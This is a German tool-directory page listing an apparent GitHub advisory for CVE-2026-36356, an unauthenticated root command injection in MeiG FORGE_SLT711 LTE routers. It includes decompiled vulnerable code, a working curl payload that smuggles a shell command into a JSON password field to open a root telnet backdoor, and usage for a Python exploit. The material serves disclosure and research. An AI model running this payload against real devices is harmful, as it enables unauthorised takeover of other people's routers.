Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Nicht authentifizierte OS-Befehlsinjektion (RCE als root) | Kitploit
Tools/GitHubGitHub/totekuh/cve-2026-36356
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Nicht authentifizierte OS-Befehlsinjektion (RCE als root)

Repository anzeigen
111vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — Nicht authentifizierte OS-Befehlsinjektion (/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • Entdecker: Daniil Gordeev
  • Offengelegt: 2026-05-03

Zusammenfassung

Der mit MeiG Smart FORGE_SLT711 4G-LTE-CPE-Geräten gebündelte GoAhead-Webserver stellt einen nicht authentifizierten HTTP-Endpunkt, /action/SetRemoteAccessCfg, bereit, der benutzergesteuerte JSON-Eingaben ohne Bereinigung in einen Shell-Befehl interpoliert. Eine einzelne nicht authentifizierte POST-Anfrage führt beliebige Befehle als root aus.

Zwei unabhängige Grundursachen: ein fehlender Authentifizierungs-Routingeintrag und eine unsichere sprintf() → system()-Konstruktion im Handler.

Betroffene Produkte

  • Hersteller: MeiG Smart Technology Co., Ltd. (Shenzhen, China)
  • Produkt: FORGE_SLT711 4G-LTE-CPE-Router
  • Bestätigte Firmware: MDM9607.LE.1.0-00110-STD.PROD-1 (Modem-Firmware BC-MGST711H_1.1.1_EQ101)
  • Webserver: GoAhead 3.x (Embedthis) mit MeiG-eigenen Aktions-Handlern (/usr/bin/goahead)

Der anfällige Code befindet sich im eigenen Aktions-Handler von MeiG, nicht im Upstream-GoAhead. Andere Firmware-Versionen dieser Produktlinie sind wahrscheinlich betroffen; nicht unabhängig verifiziert.

Testumgebung

GerätOrtel 4G LTE CPE (OEM: MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
KernelLinux 3.18.48
FirmwareMDM9607.LE.1.0-00110-STD.PROD-1
Datum

Technische Details

Fehlende Authentifizierung (CWE-306)

Die GoAhead-Routenkonfiguration /var/www/route.txt listet authentifizierte Routen (Zeilen 64–150) mit auth=basic auf. /action/SetRemoteAccessCfg befindet sich nicht in dieser Liste. Das Routing fällt auf die Catch-all-Route in Zeile 156 durch:

root@kitploit:~
route uri=/action handler=action

Die Catch-all-Route besitzt kein auth=basic, daher kann jeder HTTP-Client /action/SetRemoteAccessCfg ohne Anmeldedaten aufrufen.

Befehlsinjektion (CWE-78)

Der Handler bei Offset 0x0003c6d8 in /usr/bin/goahead dekompiliert zu:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

Das Feld password wird innerhalb doppelter Anführungszeichen interpoliert. $(...)-Substitution und `...`-Backticks werden innerhalb doppelter Anführungszeichen expandiert, sodass ein Angreifer den Shell-Befehl kontrolliert. system() läuft als uid=0, da der GoAhead-Prozess als root läuft. Keine Eingabevalidierung, kein Escaping, keine Zeichen-Whitelist.

Proof of Concept

Persistente Telnet-Hintertür

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

Unauthenticated RCE → root shell on a MeiG FORGE_SLT711 (Ortel 4G LTE CPE) via /action/SetRemoteAccessCfg

Referenz-Python-Exploit

poc_rce.py (zusammen mit diesem Advisory veröffentlicht):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

Die Ausnutzung erfolgt blind – die Befehlsausgabe ist nicht in der HTTP-Antwort enthalten.

Payload-Beschränkungen

  • password-Puffer: 64 Byte
  • Endgültiger Befehlspuffer: 256 Byte
Tool herunterladen
2026-02-21